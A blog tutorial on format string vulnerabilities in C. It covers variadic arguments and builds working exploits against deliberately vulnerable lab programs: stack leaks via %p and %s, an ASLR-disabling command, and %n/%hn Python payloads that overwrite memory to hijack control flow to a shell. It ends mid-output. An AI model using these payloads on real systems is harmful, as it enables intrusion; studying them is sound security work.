0xNinjaCyclone Blog

Penetration tester and Red teamer


[Exploit development] 7- How to do magic with string format bugs

Intro

Welcome, everyone, to the seventh part of the exploit development series. In this article, we will discuss the string format vulnerability and the programming concepts behind it. This will help us answer questions such as why it occurs and how to exploit it effectively.

To begin with, I would like to say that this type of vulnerability has become very rare, but the concepts you will learn here will definitely benefit you, increase your skills as an exploit developer, and improve your way of thinking and your methodology.

Variable Length Argument in C

The C programming language supports a feature called “Variable Length Argument”, which allows a function to receive any number of arguments at runtime. This feature is clearly visible in functions such as printf, fprintf, and sprintf. If you have ever used one of these functions, you will have noticed that we can smoothly pass many arguments to them; that is possible because of the feature we’re talking about. Understanding this feature well is the key to understanding today’s vulnerability and the amazing techniques for exploiting it.

Practical example for Variable Length Argument feature

Let’s explore a practical example in C to clarify:

#include <stdio.h>
#include <stdarg.h>

void SayHello(int nSize, ...)
{
    va_list ap;

    va_start( ap, nSize );

    while ( nSize-- )
        printf( "Hello %s\n", va_arg(ap, char *) );

    va_end( ap );
}

int main()
{
    SayHello( 3, "Abdallah", "Hamza", "Hossam" );
    return 0;
}

Let’s compile this program and show you the output.

┌──(abdallah㉿pc)-[~/path/to]
└─$ gcc VarLenArg.c -o VarLenArg

┌──(abdallah㉿pc)-[~/path/to]
└─$ ./VarLenArg 
Hello Abdallah
Hello Hamza
Hello Hossam

How does the Variable Length Argument feature work ?

When the SayHello function is called, a new stack frame is created above main’s stack frame, the passed arguments are placed in that stack frame, and the stack layout becomes as follows.

As you can see from the picture, the va_start macro gives us a pointer to the area within the stack where our arguments live, and the va_arg macro crawls the stack and gives us our data whatever its type, because the macro can calculate the size of the requested data and cast it based on the type passed as its second parameter. Let’s run the program under gdb to see exactly what happens.

gdb -nx -q ./VarLenArg
b SayHello
r
disas SayHello

The instructions mentioned are responsible for pushing the arguments onto the stack. Let’s tell gdb to execute them and then examine the stack with the following commands.

stepi 7
x/3a $rbp-0xa8
x/s 0x55555555601b
x/s 0x555555556015
x/s 0x55555555600e

Well, but what about Windows? Does the feature work the same way as on Linux, or is it different? Let us compile the example code on Windows and reverse it to explore the feature and understand exactly how it works.

Let’s walk through the picture. First, the procedure obtains a pointer to what sits just behind our data on the stack via a Load Effective Address (LEA) instruction; notice that the EDI register now contains that address. Then the function enters a loop. Each iteration decrements ESI, which holds the nSize variable that tells the function how many arguments were passed to it. EDI then advances by four bytes (the size of an address on 32-bit systems) to point to the next argument that was passed on the stack through the function call. After that, the parameters are pushed onto the stack (which decreases ESP automatically) and printf is called through EBX, which contains its address, as the picture shows. The stack pointer is then restored, and the function checks whether ESI has reached zero. If not, the code jumps back up and repeats the steps above, crawling the stack until ESI reaches zero and the loop ends.

There is nothing new here. What we explained above on Linux is the same as what happens on Windows. But doesn’t the explanation draw your attention to something? Let’s ask the question another way: what if we could force the loop to keep processing more data than is actually on the stack? That is an amazing scenario, and it is the idea behind string format vulnerabilities.

String Format Bugs

Most string format functions in the C programming language, such as scanf, printf, sprintf, and syslog, use the Variable Length Argument feature to allow users to format their data easily, whatever its type. Also, some interpreters and virtual machines, such as Python’s, use that feature internally in APIs such as PyArg_Parse, PyArg_ParseTupleAndKeywords, PyArg_ParseTuple, and many more. String format functions take a bunch of format specifiers in a string; each specifier represents data of a specific type on the stack, and based on that format, the functions retrieve and process the data. However, the bug occurs when users can control that format by passing their own.

Vulnerable code

Let me show you a simple example of code vulnerable to the string format bug, so we can learn about the vulnerability and how to benefit from it and exploit it.

#include <stdio.h>

void vulnerable(char *cpStr)
{
    printf( cpStr );
}

int main(int argc, char *argv[])
{
    char *secret = "This is a top secret data `_`";

    if ( argc > 1 )
        vulnerable( argv[1] );

    return 0;
}

That’s very basic code that takes its input from the command line arguments; if the user passes an input, the program displays it on the screen.

┌──(abdallah㉿pc)-[~]
└─$ gcc test.c -o test

┌──(abdallah㉿pc)-[~]
└─$ ./test "Hello World!"
Hello World!
┌──(abdallah㉿pc)-[~]
└─$ 

But when we analyze it and look up the manual page of the printf function, we find this declaration:

int printf(const char *restrict format, ...);

DAMN, we actually control the format that guides the function in dealing with the arguments on the stack. That means we can completely hijack the execution flow of the function and trick it into crawling the stack and leaking sensitive data from it, or doing dangerous things, depending on the features the function provides.

Exploitation

Let’s inject a malicious format and see what happens:

┌──(abdallah㉿pc)-[~]
└─$ ./test '===> { %p %p %p %p %p } <==='
===> { 0x7ffedfe63098 0x7ffedfe630b0 0x7fc931c9d738 (nil) 0x7fc931cdb1f0 } <===
┌──(abdallah㉿pc)-[~]
└─$ 

As you see we can successfully trick the function to crawl the stack and obtain valuable data from it.
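The effect can be modelled in a few lines of Python. This is only a toy sketch, not how printf is implemented: `toy_printf` and the `memory` list are hypothetical names, and the list stands in for the slot of the one real argument followed by whatever else happens to sit next to it.

```python
import re


def toy_printf(fmt, memory):
    """Toy model: every %p takes the next slot of `memory`, and nothing
    checks how many arguments the caller really passed."""
    position = 0

    def take_slot(_match):
        nonlocal position
        value = memory[position]
        position += 1
        return "(nil)" if value == 0 else hex(value)

    return re.sub(r"%p", take_slot, fmt)


# One real argument followed by unrelated neighbouring data.
memory = [0x1111, 0x2222, 0, 0xDEAD]
print(toy_printf("%p", memory))           # the format the developer intended
print(toy_printf("%p %p %p %p", memory))  # an attacker-supplied format
```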

Crashing the application

First, let’s generate a format that prints out 30 addresses from the stack using the command python3 -c 'print("%p " * 30)' and pass it as a payload to the program.

┌──(abdallah㉿pc)-[~]
└─$ ./test '%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p'
0x7fff1c7ba4f8 0x7fff1c7ba510 0x7f1577cc5738 (nil) 0x7f1577d031f0 (nil) 0x7fff1c7bc396 0x7fff1c7ba400 0x562cb2db81b2 0x7fff1c7ba4f8 0x2b2db8060 0x7fff1c7ba4f0 0x562cb2db9010 (nil) 0x7f1577b1e7fd 0x7fff1c7ba4f8 0x21c7fc000 0x562cb2db817f 0x7fff1c7ba809 0x562cb2db81c0 0x3e09cd93ee28e7d0 0x562cb2db8060 (nil) (nil) (nil) 0xc1f7f564a608e7d0 0xc02322f02144e7d0 (nil) (nil) (nil)
┌──(abdallah㉿pc)-[~]
└─$ 

As you see, the fourth and sixth pointers are NULL. We can target just those as follows:

┌──(abdallah㉿pc)-[~]
└─$ ./test '%4$p'
(nil)
┌──(abdallah㉿pc)-[~]
└─$ ./test '%6$p'
(nil)
┌──(abdallah㉿pc)-[~]
└─$ 
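Picking out the (nil) slots by eye gets tedious with longer leaks. As a small sketch, assuming the leak is a space-separated run of %p outputs like the one above, the hypothetical helper `null_positions` returns their 1-based positions, and `direct_spec` (also a made-up name) builds the matching direct-access specifier.

```python
def null_positions(leak):
    """Return the 1-based positions of the (nil) entries in a %p leak."""
    return [index for index, token in enumerate(leak.split(), start=1)
            if token == "(nil)"]


def direct_spec(position, conversion="p"):
    """Build a direct parameter access specifier such as %4$p."""
    return f"%{position}${conversion}"


sample = "0x7fff1c7ba4f8 0x7fff1c7ba510 0x7f1577cc5738 (nil) 0x7f1577d031f0 (nil)"
print(null_positions(sample))
print([direct_spec(position) for position in null_positions(sample)])
```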

Great. The function supports the %s format specifier, which allows developers to format strings with other data. That means the function will dereference the string pointer that points to the characters. But what if we force it to dereference an invalid pointer, like the eleventh pointer? Let’s test it and see what happens.

┌──(abdallah㉿pc)-[~]
└─$ ./test '%11$s'
Segmentation fault

┌──(abdallah㉿pc)-[~]
└─$ 

BINGO, we crashed the program, forcing it to stop before completing its task. There are other ways to force a crash, such as %n.

Leaking sensitive data

Let’s try to leak the secret variable within the main function. First, we need to determine where printf starts reading from and the position of the targeted data. Let’s run the program under gdb and explore that information.

gdb -nx -q ./test
b main
r "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
disas main
b *0x00005555555551ad
c
x/a $rbp-0x8
x/s 0x555555556010

First, we let the main function execute the code responsible for putting the targeted data onto the stack. When we examine the stack, we clearly see that the targeted pointer lives at 0x7fffffffdf18 within the stack. Now we are at the step just before the call to the vulnerable function, so let’s continue.

si 8
disas vulnerable

Depending on the size of the vulnerable stack frame, we start reading the stack to determine from where exactly the printf function starts reading as shown in the picture below.

As shown in the picture, the function starts reading from $rbp-0x38, so we calculate the offset of the secret data from the address that the function starts reading from.

Well, we added one to the five missing pointers at first (because format specifier positions start from one, not zero), multiplied by the pointer size, which is eight. Let’s run the program again and inject %13$s as the payload.

BINGO, we were able to force the printf function to leak the targeted secret data from the stack.
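The arithmetic behind that index can be sketched as follows. The names are hypothetical, and the address of the first stack slot used below is an illustrative value, not one taken from the debugging session. The sketch assumes the x86-64 System V convention, where the format string travels in a register, the next five arguments also come from registers, and only later ones are read from the stack.

```python
def positional_index(target_addr, first_stack_slot, register_args=5, slot_size=8):
    """Map the address of a stack slot to a printf positional index (1-based)."""
    distance = target_addr - first_stack_slot
    if distance < 0 or distance % slot_size:
        raise ValueError("target is not an aligned slot above the first stack slot")
    return distance // slot_size + register_args + 1


secret_slot = 0x7FFFFFFFDF18           # where the pointer to the secret lives (from the text)
first_stack_slot = secret_slot - 0x38  # assumed for illustration
index = positional_index(secret_slot, first_stack_slot)
print(f"%{index}$s")
```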

Redirecting execution flow

In order to control the flow of program execution or execute a specific piece of code or function, we must overwrite one of the function pointers or poison the Global Offset Table. We can also do the same thing by overwriting the instruction pointer saved on the stack (the saved return address), but the question now is how we can exploit the vulnerability to do that.

String format functions support an interesting feature or specifier called %n, that specifier requires an int pointer and writes in that variable how many characters have been processed by the function. This is a great feature that should be exploited since we have control over which variable we want to target, as we explained before, and we are able to read specific data from the stack. We can also target any data or position within the stack to overwrite it via that feature. We can write the data or addresses that we specifically want by passing the appropriate number of characters to the function. This is difficult to do manually and requires developing an automation script that exploits the bug in any programming language such as Python or Ruby. Let’s try to exploit the following program:

#include <stdio.h>
#include <stdlib.h>

int deadvar = 0;

void pwnme()
{
    system( "/bin/sh" );
}

void vulnerable()
{
    char cStrFmt[8192];
    fgets( cStrFmt, sizeof(cStrFmt), stdin );
    printf( cStrFmt );
}

void main()
{
    vulnerable();

    if ( deadvar == 1337 )
    {
        puts("This branch should never be accessed yet !!!");
        puts("You won ^_^");
    }
    
}

Compile using gcc -m32 test.c -o test to prepare our test case:

┌──(abdallah㉿pc)-[~]
└─$ python3 -c "print('A' * 16 + ' %p' * 30)" | ./test
AAAAAAAAAAAAAAAA 0x2000 0xf7f9a580 0x56556207 0x41414141 0x41414141 0x41414141 0x41414141 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0xa7025

Great, it’s vulnerable and we can inject our malicious payloads/formats via stdin. As you can see from the output above, our malicious format lands on the stack at the fourth parameter. Let’s confirm that:

┌──(abdallah㉿pc)-[~]
└─$ echo 'AAAAA%4$p' | ./test
AAAAA0x41414141
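Finding that position by eye gets harder as the leak grows. A small sketch, assuming the output is a marker followed by space-separated %p values as in the run above; `find_marker_position` is a hypothetical helper, not part of any exploitation library.

```python
def find_marker_position(leak, marker=0x41414141):
    """Return the 1-based position of the first leaked word equal to `marker`,
    or None if the marker never shows up."""
    # Only pointer-like tokens count; this skips the leading run of A's.
    words = [token for token in leak.split()
             if token.startswith("0x") or token == "(nil)"]
    for position, token in enumerate(words, start=1):
        if token != "(nil)" and int(token, 16) == marker:
            return position
    return None


leak = "AAAAAAAAAAAAAAAA 0x2000 0xf7f9a580 0x56556207 0x41414141 0x41414141 0x20702520"
print(find_marker_position(leak))
```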

Well, remember that, because we are going to abuse this fact later. Now, as shown in the vulnerable code snippet, the conditional branch inside the main function is designed to be unreachable because the condition will never be true. Let us fulfill the condition by overwriting deadvar. First, we need to disable ASLR to make sure nothing will stop us; we can use this command to disable it:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

We must now obtain the address of the deadvar variable in memory through gdb in order to overwrite it. This is very simple; we can do it as follows:

(gdb) p &deadvar
$1 = (<data variable, no debug info> *) 0x5655902c <deadvar>

Great, things are going well. Now, to successfully develop our exploit, we need to make the printf function print out 1337 characters on the screen. Moreover, we need to pass the deadvar address to printf as a parameter in order to overwrite it. The question now is how we can do that. Our options are not many, because the program is very small and does not take much input, but do you remember when I told you that our format goes onto the stack? We can abuse this fact to implicitly pass the targeted address to the printf function. We can also abuse environment variables, but we will not use that approach now. Let’s start developing our exploit based on the first method, by poisoning the format:

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0x5655902c <== target (deadvar)

payload  = b""
payload += b"\x2c\x90\x55\x56" # deadvar address in little endian format
payload += b"A" * ( 1337 - len(payload) ) 
payload += b"%4$n" # pass the deadvar address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)
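A quick sanity check on the exploit script above, as a sketch: every byte in front of %4$n is printed as is, so that offset is the value %n stores. `build_payload` is a hypothetical wrapper around the same three steps.

```python
import struct

DEADVAR_ADDR = 0x5655902C  # address reported by gdb in the text, valid only with ASLR disabled
TARGET_COUNT = 1337


def build_payload(address, count):
    """Address first, then filler so that `count` characters precede %4$n."""
    payload = struct.pack("<I", address)       # 4 bytes, little endian
    payload += b"A" * (count - len(payload))   # pad the output up to `count`
    payload += b"%4$n"                         # store the running count at argument 4
    return payload


payload = build_payload(DEADVAR_ADDR, TARGET_COUNT)
print(payload[:4].hex(), payload.index(b"%"), len(payload))
```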

Let’s try it under gdb and see what happens:

┌──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b main
Breakpoint 1 at 0x1254
(gdb) r < exploit.txt
Starting program: /home/abdallah/test < exploit.txt

Breakpoint 1, 0x56556254 in main ()
(gdb) disas main
Dump of assembler code for function main:
   0x56556245 <+0>:	lea    0x4(%esp),%ecx
   0x56556249 <+4>:	and    $0xfffffff0,%esp
   0x5655624c <+7>:	push   -0x4(%ecx)
   0x5655624f <+10>:	push   %ebp
   0x56556250 <+11>:	mov    %esp,%ebp
   0x56556252 <+13>:	push   %ebx
   0x56556253 <+14>:	push   %ecx
=> 0x56556254 <+15>:	call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x56556259 <+20>:	add    $0x2da7,%ebx
   0x5655625f <+26>:	call   0x565561f8 <vulnerable>
   0x56556264 <+31>:	mov    0x2c(%ebx),%eax
   0x5655626a <+37>:	cmp    $0x539,%eax
   0x5655626f <+42>:	jne    0x56556295 <main+80>
   0x56556271 <+44>:	sub    $0xc,%esp
   0x56556274 <+47>:	lea    -0x1ff0(%ebx),%eax
   0x5655627a <+53>:	push   %eax
   0x5655627b <+54>:	call   0x56556050 <puts@plt>
   0x56556280 <+59>:	add    $0x10,%esp
   0x56556283 <+62>:	sub    $0xc,%esp
   0x56556286 <+65>:	lea    -0x1fc3(%ebx),%eax
   0x5655628c <+71>:	push   %eax
   0x5655628d <+72>:	call   0x56556050 <puts@plt>
   0x56556292 <+77>:	add    $0x10,%esp
   0x56556295 <+80>:	nop
   0x56556296 <+81>:	lea    -0x8(%ebp),%esp
   0x56556299 <+84>:	pop    %ecx
   0x5655629a <+85>:	pop    %ebx
   0x5655629b <+86>:	pop    %ebp
   0x5655629c <+87>:	lea    -0x4(%ecx),%esp
   0x5655629f <+90>:	ret    
End of assembler dump.
(gdb) b *0x56556264
Breakpoint 2 at 0x56556264
(gdb) p (int) deadvar
$1 = 0

We have two breakpoints, one on the main function and another after the call to the vulnerable function. deadvar is zero at this point, as shown above. Let’s continue:

(gdb) c
Continuing.
,�UVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x56556264 in main ()
(gdb) p (int) deadvar
$2 = 1337

Great, things are going well. We successfully overwrote the deadvar variable, so the condition should now be met and the inaccessible code should be executed. Let’s continue and see what happens.

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAThis branch should never be accessed yet !!!
You won ^_^
[Inferior 1 (process 5287) exited with code 014]

We succeeded, guys, and we were able to change the execution flow of the program. As the next step, let’s try to call the pwnme function and get a shell. First, we have to obtain its address via the p command in gdb:

(gdb) p pwnme
$1 = {<text variable, no debug info>} 0x565561cd <pwnme>

Well, we’ve got the address we need, so let’s modify our exploit. Unfortunately, there is a problem with writing the pwnme address over the saved instruction pointer: we would need to make the printf function print out more than a billion characters on the screen to write the pwnme address to the targeted area successfully. This is crazy; it can effectively kill the terminal or crash the program. We need to think deeply and find another way. How can we solve this problem? Fortunately, string format functions support writing the number of processed characters to a short variable using the %hn format specifier. So we can divide the writing into two stages: in the first stage we write one half of the address, and in the second we write the other half. This will reduce the number of characters to be printed on the screen. Let’s do it.
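Splitting the address into two 16-bit writes can be sketched as follows. `split_halves` is a hypothetical helper name, and the comparison at the end only counts the characters each approach has to print.

```python
def split_halves(value):
    """Split a 32-bit value into its low and high 16-bit halves."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("expected a 32-bit value")
    return value & 0xFFFF, value >> 16


PWNME_ADDR = 0x565561CD  # address reported by gdb in the text
low, high = split_halves(PWNME_ADDR)
print(hex(low), hex(high))
print(f"one %n write: {PWNME_ADDR:,} characters, two %hn writes: {max(low, high):,}")
```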

The first step is to obtain the address of the saved return address so that we can target it. This is not difficult; we can grab it as follows:

┌──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b vulnerable 
Breakpoint 1 at 0x11fc
(gdb) r
Starting program: /home/abdallah/test 

Breakpoint 1, 0x565561fc in vulnerable ()
(gdb) x/a $ebp+0x4
0xffffd13c:	0x56556264 <main+31>

Very nice. Our target is the address 0xffffd13c and we should write 0x565561cd to it. Let’s try to do that and develop the exploit.
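The two pointers that lead the payload can be produced as follows, as a sketch. `pack_halfword_targets` is a hypothetical helper, and the address is the one from the gdb session above, so it is only meaningful with ASLR disabled.

```python
import struct


def pack_halfword_targets(address):
    """Return the little-endian addresses of the low and high halves of a
    32-bit word stored at `address`."""
    low_half = struct.pack("<I", address)       # bytes 0-1 of the word
    high_half = struct.pack("<I", address + 2)  # bytes 2-3 of the word
    return low_half, high_half


RETURN_SLOT = 0xFFFFD13C  # from the gdb session in the text, ASLR disabled
low_half, high_half = pack_halfword_targets(RETURN_SLOT)
print(low_half, high_half)
```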

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"A" * ( 0x61cd - len(payload) ) 
payload += b"%4$hn" # pass the low order address as a parameter to printf
payload += b"B" * ( 0x5655 - len(payload) ) 
payload += b"%5$hn" # pass the high order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Let’s run this exploit and see what happens:

┌──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b vulnerable 
Breakpoint 1 at 0x11fc
(gdb) r < exploit.txt
Starting program: /home/abdallah/test < exploit.txt

Breakpoint 1, 0x565561fc in vulnerable ()
(gdb) disas vulnerable 
Dump of assembler code for function vulnerable:
   0x565561f8 <+0>:	push   %ebp
   0x565561f9 <+1>:	mov    %esp,%ebp
   0x565561fb <+3>:	push   %ebx
=> 0x565561fc <+4>:	sub    $0x2004,%esp
   0x56556202 <+10>:	call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x56556207 <+15>:	add    $0x2df9,%ebx
   0x5655620d <+21>:	mov    -0xc(%ebx),%eax
   0x56556213 <+27>:	mov    (%eax),%eax
   0x56556215 <+29>:	sub    $0x4,%esp
   0x56556218 <+32>:	push   %eax
   0x56556219 <+33>:	push   $0x2000
   0x5655621e <+38>:	lea    -0x2008(%ebp),%eax
   0x56556224 <+44>:	push   %eax
   0x56556225 <+45>:	call   0x56556040 <fgets@plt>
   0x5655622a <+50>:	add    $0x10,%esp
   0x5655622d <+53>:	sub    $0xc,%esp
   0x56556230 <+56>:	lea    -0x2008(%ebp),%eax
   0x56556236 <+62>:	push   %eax
   0x56556237 <+63>:	call   0x56556030 <printf@plt>
   0x5655623c <+68>:	add    $0x10,%esp
   0x5655623f <+71>:	nop
   0x56556240 <+72>:	mov    -0x4(%ebp),%ebx
   0x56556243 <+75>:	leave  
   0x56556244 <+76>:	ret    
End of assembler dump.
(gdb) x/a 0xffffd13c
0xffffd13c:	0x56556264 <main+31>

We put a breakpoint on the vulnerable function, then run the program and pass it the payload. When we examine the return address, we see that it still returns to the main function. We expect that when the printf function is called, the address of the pwnme function will be written over this data. Let’s put a breakpoint on the ret instruction and check whether the expected data has been written:

(gdb) b *0x56556244
Breakpoint 2 at 0x56556244
(gdb) c
Continuing.
<���>���AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA